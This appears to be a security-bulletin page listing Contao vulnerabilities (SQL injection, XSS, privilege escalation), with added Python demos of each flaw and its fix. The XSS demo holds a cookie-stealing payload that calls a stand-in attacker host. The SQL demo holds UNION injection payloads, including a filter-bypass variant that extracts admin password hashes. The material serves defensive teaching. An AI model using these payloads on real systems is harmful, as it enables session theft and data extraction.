The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Contao

vulnerability alert CVE-2019-11512

Contao: SQL injection

Synthesis of the vulnerability

An attacker can exploit a SQL injection in Contao in order to read or alter data.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading, data creation/edition, data deletion.
Provenance: internet client.
Creation date: 30/04/2019.
Identifiers: CVE-2019-11512, VIGILANCE-VUL-29164.

Description of the vulnerability

An attacker can exploit a SQL injection in Contao in order to read or alter data.
The fix shipped for VIGILANCE-VUL-24480 (CVE-2017-16558, listed further down this page) is incomplete: the SQL injection it was meant to close remains exploitable.

vulnerability alert CVE-2019-10643

Contao: privilege escalation via Opt-in Tokens

Synthesis of the vulnerability

An attacker can bypass access restrictions via the opt-in tokens of Contao in order to escalate their privileges.
Impacted products: Contao.
Severity: 2/4.
Consequences: administrator access/rights, privileged access/rights.
Provenance: intranet client.
Creation date: 09/04/2019.
Identifiers: CVE-2019-10643, VIGILANCE-VUL-28981.

Description of the vulnerability

An attacker can bypass access restrictions via the opt-in tokens of Contao in order to escalate their privileges.

vulnerability alert CVE-2019-10642

Contao: privilege escalation via Request Token

Synthesis of the vulnerability

An attacker can bypass access restrictions via the request token mechanism of Contao in order to escalate their privileges.
Impacted products: Contao.
Severity: 2/4.
Consequences: privileged access/rights, user access/rights.
Provenance: intranet client.
Creation date: 09/04/2019.
Identifiers: CVE-2019-10642, VIGILANCE-VUL-28980.

Description of the vulnerability

An attacker can bypass access restrictions via the request token mechanism of Contao in order to escalate their privileges.

vulnerability alert CVE-2019-10641

Contao: privilege escalation via Valid Session After Password Change

Synthesis of the vulnerability

Contao leaves existing sessions valid after a password change, so an attacker who already holds a session for an account keeps that access after the legitimate user changes the password, and can use it to escalate their privileges.
Impacted products: Contao.
Severity: 2/4.
Consequences: privileged access/rights, user access/rights.
Provenance: user account.
Creation date: 09/04/2019.
Identifiers: CVE-2019-10641, VIGILANCE-VUL-28979.

Description of the vulnerability

Contao leaves existing sessions valid after a password change, so an attacker who already holds a session for an account keeps that access after the legitimate user changes the password, and can use it to escalate their privileges.
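The defect described above, as an added illustration that is not part of the Vigil@nce bulletin or of Contao's code: a minimal session store in Python that reproduces the weak behaviour (a session issued before a password change stays valid afterwards) next to the usual fix of binding each session to a per-user password generation counter that is bumped on every password change. The SessionStore class, its method names and the sample account are assumptions made for the demo.

```python
"""Session store that is, or is not, invalidated by a password change.

Constructed illustration, not Contao code. SessionStore, its method names
and the sample account are assumptions made for the demo.
"""
import hashlib
import hmac
import secrets


class SessionStore:
    def __init__(self, bind_to_password_generation: bool):
        # False reproduces the weak behaviour: sessions outlive a password change.
        # True applies the fix: every session records the password generation
        # it was issued under and dies as soon as that generation moves on.
        self.bind = bind_to_password_generation
        self.users = {}     # username -> {"salt", "pw_hash", "pw_gen"}
        self.sessions = {}  # session id -> {"user", "pw_gen"}

    @staticmethod
    def _hash(password: str, salt: str) -> str:
        # PBKDF2 with a per-user salt; the iteration count is kept low for the demo.
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 20_000).hex()

    def _check(self, username: str, password: str) -> bool:
        user = self.users.get(username)
        if user is None:
            return False
        return hmac.compare_digest(user["pw_hash"], self._hash(password, user["salt"]))

    def create_user(self, username: str, password: str) -> None:
        salt = secrets.token_hex(16)
        self.users[username] = {"salt": salt, "pw_hash": self._hash(password, salt), "pw_gen": 0}

    def login(self, username: str, password: str):
        """Return a new session id, or None if the credentials are wrong."""
        if not self._check(username, password):
            return None
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": username, "pw_gen": self.users[username]["pw_gen"]}
        return sid

    def change_password(self, username: str, old: str, new: str) -> bool:
        if not self._check(username, old):
            return False
        user = self.users[username]
        user["salt"] = secrets.token_hex(16)
        user["pw_hash"] = self._hash(new, user["salt"])
        # Bumping the generation is what retroactively kills every existing session
        # when bind_to_password_generation is on; nothing else needs to be tracked.
        user["pw_gen"] += 1
        return True

    def resolve(self, sid: str):
        """Return the username behind a valid session id, or None."""
        sess = self.sessions.get(sid)
        if sess is None:
            return None
        if self.bind and sess["pw_gen"] != self.users[sess["user"]]["pw_gen"]:
            del self.sessions[sid]  # issued under an old password: drop it
            return None
        return sess["user"]


def attacker_keeps_access(bind: bool) -> bool:
    """Scenario from the bulletin: the attacker already holds a session for the
    account (stolen cookie, shared machine). The victim then changes the
    password. Returns True if the old session still resolves to the victim."""
    store = SessionStore(bind_to_password_generation=bind)
    store.create_user("victim", "correct horse")
    stolen_sid = store.login("victim", "correct horse")
    assert store.change_password("victim", "correct horse", "battery staple")
    return store.resolve(stolen_sid) == "victim"


if __name__ == "__main__":
    print("weak store, old session still valid:", attacker_keeps_access(False))
    print("fixed store, old session still valid:", attacker_keeps_access(True))
```

The generation counter is preferable to deleting sessions at password-change time because it also covers sessions held in a separate store (a cache, a second application node) that the password-change handler cannot enumerate: any session carrying a stale generation is rejected the next time it is presented.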

vulnerability alert CVE-2018-20028

Contao: information disclosure via Back End Users Records View

Synthesis of the vulnerability

An attacker with a back end account can bypass access restrictions in the back end users records view of Contao in order to obtain sensitive information.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading.
Provenance: user account.
Creation date: 14/12/2018.
Identifiers: CVE-2018-20028, VIGILANCE-VUL-28026.

Description of the vulnerability

An attacker with a back end account can bypass access restrictions in the back end users records view of Contao in order to obtain sensitive information.

vulnerability alert CVE-2018-17057

TCPDF: code execution

Synthesis of the vulnerability

An attacker can exploit a vulnerability in the TCPDF library, which Contao bundles and Fedora packages, in order to run code.
Impacted products: Contao, Fedora.
Severity: 3/4.
Consequences: user access/rights.
Provenance: document.
Creation date: 18/09/2018.
Identifiers: CVE-2018-17057, FEDORA-2018-187e212568, FEDORA-2018-f1ca41a1a6, VIGILANCE-VUL-27255.

Description of the vulnerability

An attacker can exploit a vulnerability in the TCPDF library, which Contao bundles and Fedora packages, in order to run code.

vulnerability alert CVE-2018-10125

Contao: Cross Site Scripting via Back End System Log

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via the back end system log of Contao in order to run JavaScript code in the context of the web site.
Impacted products: Contao.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 18/04/2018.
Identifiers: CVE-2018-10125, VIGILANCE-VUL-25911.

Description of the vulnerability

Contao is a web content management system with a browser-based back end.

However, it does not escape data that reaches the back end system log before inserting it into the generated HTML documents.

An attacker who can get attacker-controlled data written to the system log can therefore trigger a Cross Site Scripting in Contao, and run JavaScript code in the browser of the back end user who views the log, in the context of the web site.

vulnerability alert CVE-2018-5478

Contao: Cross Site Scripting via newsletter

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via the newsletter module of Contao in order to run JavaScript code in the context of the web site.
Impacted products: Contao.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 18/01/2018.
Identifiers: CVE-2018-5478, VIGILANCE-VUL-25111.

Description of the vulnerability

Contao is a web content management system with a browser-based back end.

However, it does not escape data received through the newsletter module before inserting it into the generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via the newsletter module of Contao in order to run JavaScript code in the context of the web site.
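The two XSS bulletins above (CVE-2018-10125, back end system log; CVE-2018-5478, newsletter) describe the same defect class: stored data that the attacker influenced is later concatenated into back end HTML without escaping. The following Python is an added illustration, not code from the Vigil@nce bulletins or from Contao: a vulnerable renderer for a log table and a newsletter list, the escaped version, and a small parser-based regression check that flags any tag or on* attribute that is not part of the view itself. The log entries, the newsletter records, the field names and the payloads are constructed for the demo; nothing here claims which field Contao actually failed to escape.

```python
"""Stored XSS through an unescaped back-end view, and the fix.

Constructed illustration, not Contao code. The log entries, the newsletter
records, the field names and the two payloads are made up for the demo.
"""
from html import escape
from html.parser import HTMLParser

# Constructed stored records. The User-Agent string of a failed login and the
# subject of a newsletter stand in for attacker-controlled data that the
# application writes to its database and later shows to an administrator.
SYSTEM_LOG = [
    {"ts": "2018-04-18 10:02:11", "action": "LOGIN_FAILED",
     "msg": 'Invalid password for user "admin"', "ua": "Mozilla/5.0"},
    {"ts": "2018-04-18 10:02:19", "action": "LOGIN_FAILED",
     "msg": 'Invalid password for user "admin"',
     "ua": '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">'},
]
NEWSLETTERS = [
    {"id": 1, "subject": "April news"},
    {"id": 2, "subject": "Special offer <script>alert(document.domain)</script>"},
]
LOG_COLUMNS = ("ts", "action", "msg", "ua")


def render_log_vulnerable(entries) -> str:
    # Stored values are concatenated into the markup as they are.
    rows = "".join("<tr>" + "".join(f"<td>{e[k]}</td>" for k in LOG_COLUMNS) + "</tr>"
                   for e in entries)
    return "<table>" + rows + "</table>"


def render_log_fixed(entries) -> str:
    # Escape at the point where each value enters an HTML text context.
    # quote=True also encodes ' and " so the helper is safe inside attributes.
    rows = "".join("<tr>" + "".join(f"<td>{escape(str(e[k]), quote=True)}</td>" for k in LOG_COLUMNS) + "</tr>"
                   for e in entries)
    return "<table>" + rows + "</table>"


def render_newsletters_vulnerable(items) -> str:
    return "<ul>" + "".join(f'<li data-id="{i["id"]}">{i["subject"]}</li>' for i in items) + "</ul>"


def render_newsletters_fixed(items) -> str:
    return "<ul>" + "".join(
        f'<li data-id="{escape(str(i["id"]), quote=True)}">{escape(i["subject"], quote=True)}</li>'
        for i in items) + "</ul>"


class ActiveMarkupDetector(HTMLParser):
    """Regression check for the rendered page: anything beyond the view's own
    tags, or any on* attribute, means stored data was parsed as markup."""
    ALLOWED = {"table", "tr", "td", "ul", "li"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED:
            self.findings.append(f"unexpected tag <{tag}>")
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")


def find_active_markup(html: str) -> list:
    detector = ActiveMarkupDetector()
    detector.feed(html)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for name, page in [("log, vulnerable", render_log_vulnerable(SYSTEM_LOG)),
                       ("log, fixed", render_log_fixed(SYSTEM_LOG)),
                       ("newsletter, vulnerable", render_newsletters_vulnerable(NEWSLETTERS)),
                       ("newsletter, fixed", render_newsletters_fixed(NEWSLETTERS))]:
        print(f"{name}: {find_active_markup(page) or 'clean'}")
```

The check deliberately parses the output instead of searching for substrings: the escaped page still contains the text "onerror=" as data, and only a parser tells data apart from an attribute. In a real code base the escaping belongs in the template engine's default output mode rather than in each call site.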

vulnerability alert CVE-2017-16558

Contao: SQL injection

Synthesis of the vulnerability

An attacker can exploit a SQL injection in Contao in order to read or alter data.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading, data creation/edition, data deletion.
Provenance: internet client.
Creation date: 16/11/2017.
Identifiers: CVE-2017-16558, VIGILANCE-VUL-24480.

Description of the vulnerability

Contao stores its data in a SQL database.

However, user-supplied data is inserted directly into a SQL query instead of being bound as a query parameter.

An attacker can therefore exploit a SQL injection in Contao in order to read or alter data.
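The defect described above, and the "wrong fix" situation of CVE-2019-11512 at the top of this page, as an added illustration that is not code from the Vigil@nce bulletins or from Contao. The Python below, on an in-memory SQLite database, shows three versions of a record lookup: the request value spliced into the query text, a first patch that only strips keywords from the input and is defeated by a nested payload, and the parameterized query that actually closes the hole. The tables, the handler names, the keyword blacklist and the payloads are constructed for the demo; nothing here claims which query in Contao was affected or what its patch looked like.

```python
"""SQL injection by string concatenation, an incomplete fix, and the fix.

Constructed illustration, not Contao code. The tables, the record-lookup
handlers, the keyword blacklist and the payloads are made up for the demo.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample schema: public member records and a table that a
    # member lookup must never expose.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, email TEXT);
        INSERT INTO members VALUES (1, 'alice', 'alice@example.org');
        INSERT INTO members VALUES (2, 'bob', 'bob@example.org');
        CREATE TABLE backend_users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
        INSERT INTO backend_users VALUES (1, 'admin', 'sha256$deadbeef');
    """)
    return db


def member_vulnerable(db, member_id: str):
    # Request value spliced straight into the SQL text: the defect class the
    # bulletin describes.
    return db.execute(f"SELECT id, username, email FROM members WHERE id = {member_id}").fetchall()


def member_incomplete_fix(db, member_id: str):
    # A first "fix" that strips keywords from the input. It stops the obvious
    # payload but not a nested one: the general pattern behind a patch that
    # turns out to be incomplete.
    cleaned = re.sub(r"union|select", "", member_id, flags=re.IGNORECASE)
    return db.execute(f"SELECT id, username, email FROM members WHERE id = {cleaned}").fetchall()


def member_fixed(db, member_id: str):
    # Bind the value as a parameter: the database receives it as data, never
    # as SQL. Converting to int first rejects anything that is not an id.
    try:
        mid = int(member_id)
    except ValueError:
        return []
    return db.execute("SELECT id, username, email FROM members WHERE id = ?", (mid,)).fetchall()


PAYLOAD = "0 UNION SELECT id, username, pw_hash FROM backend_users"
# Each keyword wraps a copy of itself: removing the inner copy leaves the
# outer one intact, so the blacklist reassembles the payload it tried to kill.
PAYLOAD_NESTED = "0 UNunionION SEselectLECT id, username, pw_hash FROM backend_users"


def probe(handler, db, value):
    """Run a handler with a request value; None means the query failed."""
    try:
        return handler(db, value)
    except sqlite3.Error:
        return None


def leaks_hash(rows) -> bool:
    return rows is not None and any("sha256$" in str(row) for row in rows)


if __name__ == "__main__":
    db = make_db()
    for name, handler in [("vulnerable", member_vulnerable),
                          ("incomplete fix", member_incomplete_fix),
                          ("parameterized", member_fixed)]:
        for label, value in [("plain", PAYLOAD), ("nested", PAYLOAD_NESTED)]:
            rows = probe(handler, db, value)
            print(f"{name:15} {label:7} -> {'LEAK' if leaks_hash(rows) else 'no leak'} {rows}")
```

The lesson for reviewing a SQL injection patch is in the middle handler: a fix that transforms the input and then still concatenates it has not changed the trust boundary, so the retest after a patch should include payloads built against the filter, not only the original proof of concept.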

vulnerability alert CVE-2017-10993

Contao: file reading via PHP Back End

Synthesis of the vulnerability

A local attacker can read a file via the PHP back end of Contao in order to obtain sensitive information.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading.
Provenance: document.
Creation date: 12/07/2017.
Identifiers: CVE-2017-10993, VIGILANCE-VUL-23237.

Description of the vulnerability

A local attacker can read a file via the PHP back end of Contao in order to obtain sensitive information.